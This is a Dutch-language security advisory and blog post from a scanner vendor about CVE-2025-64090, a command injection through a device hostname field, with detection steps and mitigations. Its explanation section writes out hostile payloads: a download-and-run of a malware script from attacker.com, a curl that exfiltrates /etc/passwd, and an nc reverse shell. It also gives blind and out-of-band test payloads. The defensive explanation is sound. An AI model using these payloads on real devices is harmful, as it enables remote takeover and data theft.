剣 KENSAI

CVE-2025-64090: Geauthenticeerde Command Injection via Apparaat-Hostname

9 januari 2026 8 min leestijd beveiliging

Kort samengevat: Geauthenticeerde aanvallers kunnen willekeurige OS-commando's uitvoeren door shell-metatekens te injecteren in het hostname-veld van het apparaat. CVSS 10.0. Een veelvoorkomende kwetsbaarheidsklasse in netwerkapparaten en embedded systemen die consequent tot kritieke impact leidt.

CVSS 10.0 — KRITIEK

VeldDetail
CVE IDCVE-2025-64090
ErnstKRITIEK (CVSS 3.1: 10.0)
Type kwetsbaarheidOS Command Injection (CWE-78)
Gepubliceerd9 januari 2026
Authenticatie vereistJa (lage privileges)
AanvalsvectorNetwerk

Wat is CVE-2025-64090?

CVE-2025-64090 is een command injection-kwetsbaarheid waarbij het configuratieveld voor de apparaat-hostname ongesaneerd wordt doorgegeven aan een onderliggend shell-commando. Door shell-metatekens (;, |, `, $()) in de hostname-waarde in te voegen, kunnen geauthenticeerde aanvallers uitbreken uit de bedoelde commandocontext en willekeurige OS-commando's uitvoeren met de rechten van het managementproces van het apparaat — doorgaans root.

Deze kwetsbaarheidsklasse komt veel voor in netwerkapparaten, IoT-hardware, routers, firewalls en embedded Linux-systemen waar webgebaseerde managementinterfaces shell-commando's opbouwen uit door gebruikers aangeleverde configuratiewaarden zonder correcte sanering.

⚠ Lage drempel voor volledige compromittering

Elke geauthenticeerde gebruiker — ook accounts met lage privileges — kan commando-uitvoering op rootniveau bereiken. In omgevingen met standaard- of zwakke wachtwoorden wordt dit effectief niet-geauthenticeerde exploitatie.

Werking van de command injection

# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)

# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`

# Subshell:
$(id > /var/www/html/pwned.txt)

# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh

Getroffen versies

Raadpleeg het leveranciersadvies voor specifieke hardwaremodellen en firmwareversies. Netwerkapparaten met webgebaseerde managementinterfaces die hostname-configuratie blootstellen, vormen het primaire risico-oppervlak.

Detectiemethoden

Testen op hostname-injectie

# Manual test: submit hostname with command injection payload
# Use time-delay to confirm blind injection
POST /admin/network/hostname
hostname=test%3Bsleep%205

# If response delays ~5 seconds: vulnerable

# Out-of-band confirmation:
hostname=test%3Bnslookup+attacker.burpcollaborator.net

🔍 KENSAI-detectie: De apparaat-beveiligingsscanner van KENSAI test managementinterfacevelden zoals hostname, DNS, NTP en SNMP-configuratie op OS command injection. CVE-2025-64090-patronen zijn opgenomen in de beoordelingsprofielen voor netwerkapparaten.

Mitigatiestappen

  1. Pas direct de firmware-update van de leverancier toe.
  2. Invoervalidatie: hostname-velden mogen alleen alfanumerieke tekens en koppeltekens accepteren (conform RFC 952/1123).
  3. Gebruik veilige API's: vervang het opbouwen van shell-commando's door systeemaanroepen die argumentenarrays accepteren (geen shell-interpolatie).
  4. Beperk de managementinterface: beperk toegang tot de management-UI tot vertrouwde IP-bereiken via firewallregels.
  5. Wijzig standaardcredentials: zorg dat alle managementaccounts sterke, unieke wachtwoorden gebruiken.
  6. Netwerksegmentatie: isoleer managementinterfaces van netwerken die toegankelijk zijn voor gebruikers.
Command injection in uw netwerkapparaten?

KENSAI scant netwerkapparaten en managementinterfaces op command injection-kwetsbaarheden, waaronder CVE-2025-64090. Spoor kwetsbare apparaten op voordat aanvallers voet aan de grond krijgen.

Scan netwerkapparaten gratis